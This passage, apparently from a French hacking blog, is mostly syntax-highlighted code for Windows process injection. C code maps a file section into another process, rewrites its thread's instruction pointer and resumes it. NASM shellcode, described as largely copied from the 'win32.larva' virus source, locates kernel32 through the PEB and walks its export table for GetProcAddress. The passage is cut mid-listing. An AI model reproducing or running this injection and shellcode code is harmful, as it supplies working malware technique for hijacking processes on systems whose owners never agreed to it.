#b1b100;">if</span> <span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>hFile <span style="color: #66cc66;">=</span> CreateFileA<span style="color: #66cc66;">(</span><span style="color: #ff0000;">"lolilol"</span>,<span style="color: #66cc66;">(</span>GENERIC_READ | GENERIC_WRITE<span style="color: #66cc66;">)</span>,FILE_SHARE_READ | FILE_SHARE_WRITE , <span style="color: #000000; font-weight: bold;">NULL</span>, OPEN_ALWAYS,<span style="color: #cc66cc;">0</span>,<span style="color: #000000; font-weight: bold;">NULL</span><span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span> <span style="color: #66cc66;">==</span> INVALID_HANDLE_VALUE<span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> MessageBoxA<span style="color: #66cc66;">(</span><span style="color: #000000; font-weight: bold;">NULL</span>,<span style="color: #ff0000;">"CreateFile FAIL"</span>,<span style="color: #ff0000;">"ARZOOOOO"</span>,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> <span style="color: #cc66cc;">0</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span><span style="color: #66cc66;">!</span>WriteFile<span style="color: #66cc66;">(</span>hFile,<span style="color: #66cc66;">&</span>context.<span style="color: #202020;">Eip</span>,<span style="color: #cc66cc;">4</span>,<span style="color: #66cc66;">&</span>nbBytesWritten,<span style="color: #000000; font-weight: bold;">NULL</span><span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span> || <span style="color: #66cc66;">(</span>nbBytesWritten <span style="color: #66cc66;">!=</span> <span style="color: #cc66cc;">4</span><span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> MessageBoxA<span style="color: #66cc66;">(</span><span style="color: #000000; font-weight: bold;">NULL</span>,<span style="color: #ff0000;">"WriteFile FAIL"</span>,<span style="color: #ff0000;">"ARZOOOOO"</span>,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> <span style="color: #cc66cc;">0</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> CloseHandle<span style="color: #66cc66;">(</span>hFile<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>hFile <span style="color: #66cc66;">=</span> CreateFileA<span style="color: #66cc66;">(</span><span style="color: #ff0000;">"lolilol"</span>,0x100020,FILE_SHARE_READ | FILE_SHARE_WRITE , <span style="color: #000000; font-weight: bold;">NULL</span>, OPEN_ALWAYS,<span style="color: #cc66cc;">0</span>,<span style="color: #000000; font-weight: bold;">NULL</span><span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span> <span style="color: #66cc66;">==</span> INVALID_HANDLE_VALUE<span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> MessageBoxA<span style="color: #66cc66;">(</span><span style="color: #000000; font-weight: bold;">NULL</span>,<span style="color: #ff0000;">"CreateFile FAIL"</span>,<span style="color: #ff0000;">"ARZOOOOO"</span>,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> <span style="color: #cc66cc;">0</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">(</span>ZwCreateSection<span style="color: #66cc66;">(</span><span style="color: #66cc66;">&</span>hSection,0xE,<span style="color: #000000; font-weight: bold;">NULL</span>,<span style="color: #000000; font-weight: bold;">NULL</span>,0x10,0x8000000,hFile<span style="color: #66cc66;">)</span> <span style="color: #66cc66;">!=</span> STATUS_SUCCESS<span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> MessageBoxA<span style="color: #66cc66;">(</span><span style="color: #000000; font-weight: bold;">NULL</span>,<span style="color: #ff0000;">"ZwCreateSection FAIL"</span>,<span style="color: #ff0000;">"ARZOOOOO"</span>,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> <span style="color: #cc66cc;">0</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>hProcess <span style="color: #66cc66;">=</span> OpenProcess<span style="color: #66cc66;">(</span>PROCESS_VM_OPERATION,<span style="color: #000000; font-weight: bold;">FALSE</span>,PID<span style="color: #66cc66;">)</span><span style="color: #66cc66;">)</span> <span style="color: #66cc66;">==</span> <span style="color: #000000; font-weight: bold;">NULL</span><span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> MessageBoxA<span style="color: #66cc66;">(</span><span style="color: #000000; font-weight: bold;">NULL</span>,<span style="color: #ff0000;">"OpenProcess FAIL"</span>,<span style="color: #ff0000;">"ARZOOOOO"</span>,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> <span style="color: #cc66cc;">0</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">if</span> <span style="color: #66cc66;">(</span>ZwMapViewOfSection<span style="color: #66cc66;">(</span>hSection,hProcess,<span style="color: #66cc66;">&</span>BaseAddress,<span style="color: #66cc66;">(</span>ULONG_PTR<span style="color: #66cc66;">)</span><span style="color: #000000; font-weight: bold;">NULL</span>,<span style="color: #cc66cc;">0</span>,<span style="color: #000000; font-weight: bold;">NULL</span>,<span style="color: #66cc66;">&</span>ViewSize,ViewUnmap,<span style="color: #cc66cc;">0</span>,0x10<span style="color: #66cc66;">)</span> <span style="color: #66cc66;">!=</span> STATUS_SUCCESS<span style="color: #66cc66;">)</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">{</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> MessageBoxA<span style="color: #66cc66;">(</span><span style="color: #000000; font-weight: bold;">NULL</span>,<span style="color: #ff0000;">"ZwMapViewOfSection FAIL"</span>,<span style="color: #ff0000;">"ARZOOOOO"</span>,<span style="color: #cc66cc;">0</span><span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> <span style="color: #cc66cc;">0</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #66cc66;">}</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> context.<span style="color: #202020;">Eip</span> <span style="color: #66cc66;">=</span> <span style="color: #66cc66;">(</span><span style="color: #66cc66;">(</span>DWORD<span style="color: #66cc66;">)</span>BaseAddress<span style="color: #66cc66;">)</span> <span style="color: #66cc66;">+</span> <span style="color: #cc66cc;">4</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> SetThreadContext<span style="color: #66cc66;">(</span>hThread,<span style="color: #66cc66;">&</span>context<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> ResumeThread<span style="color: #66cc66;">(</span>hThread<span style="color: #66cc66;">)</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #b1b100;">return</span> <span style="color: #cc66cc;">0</span>;</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #66cc66;">}</span></div></li></ol></pre>
<p>code de la payload en NASM assemblé en .bin (TRES largement pompée sur le code de Silma pour son <a href="http://fat.next-touch.com/code/win32.larva.asm" hreflang="fr">win32.larva</a>) :</p>
<pre class="asm"><ol><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">BITS <span style="color: #ff0000;">32</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">OriginalEip <span style="color: #0000ff;">dd</span> <span style="color: #ff0000;">0</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #46aa03; font-weight:bold;">edi</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">call</span> delta</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> delta:</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">pop</span> <span style="color: #46aa03; font-weight:bold;">edi</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">sub</span> <span style="color: #46aa03; font-weight:bold;">edi</span>, delta</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">push</span> <span style="color: #0000ff;">DWORD</span> <span style="color: #66cc66;">[</span>OriginalEip+<span style="color: #46aa03; font-weight:bold;">edi</span><span style="color: #66cc66;">]</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">xchg</span> <span style="color: #46aa03; font-weight:bold;">edi</span> , <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">esp</span><span style="color: #66cc66;">]</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">xchg</span> <span style="color: #46aa03; font-weight:bold;">edi</span> , <span style="color: #66cc66;">[</span>esp<span style="color: #ff0000;">+4</span><span style="color: #66cc66;">]</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">xchg</span> <span style="color: #46aa03; font-weight:bold;">edi</span> , <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">esp</span><span style="color: #66cc66;">]</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">pushfd</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">pushad</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #adadad; font-style: italic;">;--------------------------------------+---------------------------------------+</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #adadad; font-style: italic;">;______________________________FIND KERNEL32 ADDRESS___________________________|</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #adadad; font-style: italic;">;--------------------------------------+---------------------------------------+</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #adadad; font-style: italic;">; address 0x30 of the TEB contains</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">ebp</span> , <span style="color: #46aa03; font-weight:bold;">esp</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">sub</span> <span style="color: #46aa03; font-weight:bold;">esp</span> , <span style="color: #ff0000;">3</span>*<span style="color: #ff0000;">4</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> %define _KernelAddr ebp<span style="color: #ff0000;">-4</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> %define _GetProcAddress ebp<span style="color: #ff0000;">-8</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> %define KernelType ebp<span style="color: #ff0000;">-12</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">eax</span>, <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">fs</span>:30h<span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">; a pointer to the PEB.</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">test</span> <span style="color: #46aa03; font-weight:bold;">eax</span>, <span style="color: #46aa03; font-weight:bold;">eax</span> <span style="color: #adadad; font-style: italic;">; this pointer is signed on 9x kernel,</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">js</span> Kernel_9x <span style="color: #adadad; font-style: italic;">; and is unsigned on NT kernel.</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> Kernel_NT:</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">eax</span>, <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">eax</span>+<span style="color: #ff0000;">00Ch</span><span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">; to an internal strucure called _PEB_LDR_DATA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">esi</span>, <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">eax</span>+<span style="color: #ff0000;">01Ch</span><span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">; esi=InInitialisationOrderModuleList</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">lodsd</span> <span style="color: #adadad; font-style: italic;">; eax=Foward Link of kernel32</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">eax</span>, <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">eax</span>+<span style="color: #ff0000;">08h</span><span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">; eax=kernel32 image_base</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">inc</span> <span style="color: #0000ff;">byte</span> <span style="color: #66cc66;">[</span>KernelType<span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;identify the kernel type: 1=NT;0=9x</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">jmp</span> FindKernel32_end</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> Kernel_9x:</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">eax</span>, <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">eax</span>+<span style="color: #ff0000;">034h</span><span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">; to a HeapHandle table</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">eax</span>, <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">eax</span>+<span style="color: #ff0000;"><span style="color: #ff0000;">0B</span>8h</span><span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">; eax=kernel32 image base</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">and</span> <span style="color: #0000ff;">byte</span> <span style="color: #66cc66;">[</span>KernelType<span style="color: #66cc66;">]</span>,<span style="color: #ff0000;">0</span> <span style="color: #adadad; font-style: italic;">;type=0</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> FindKernel32_end:</div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span>_KernelAddr<span style="color: #66cc66;">]</span>, <span style="color: #46aa03; font-weight:bold;">eax</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #adadad; font-style: italic;">;--------------------------------------+---------------------------------------+</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #adadad; font-style: italic;">;_____________________________RETRIEVE GETPROCADDRESS__________________________|</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color: #adadad; font-style: italic;">;--------------------------------------+---------------------------------------+ </span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">edx</span>, <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span>_KernelAddr<span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;edx=K32 image base</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">eax</span>, <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">eax</span>+<span style="color: #ff0000;">03Ch</span><span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;eax=PE signature</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">edx</span>, <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">edx</span>+<span style="color: #46aa03; font-weight:bold;">eax</span>+78h<span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;edx=export table RVA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">add</span> <span style="color: #46aa03; font-weight:bold;">edx</span>, <span style="color: #66cc66;">[</span>_KernelAddr<span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;edx=export VA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> </div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">ecx</span>, <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">edx</span>+18h<span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;ecx=number of exports (exports "by name")</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">mov</span> <span style="color: #46aa03; font-weight:bold;">ebx</span>, <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span><span style="color: #46aa03; font-weight:bold;">edx</span>+20h<span style="color: #66cc66;">]</span> <span style="color: #adadad; font-style: italic;">;ebx=name RVA</span></div></li><li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;"><div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"> <span style="color: #00007f;">add</span> <span style="color: #46aa03; font-weight:bold;">ebx</span>, <span style="color: #0000ff;">dword</span> <span style="color: #66cc66;">[</span>_KernelAddr<span style="color: 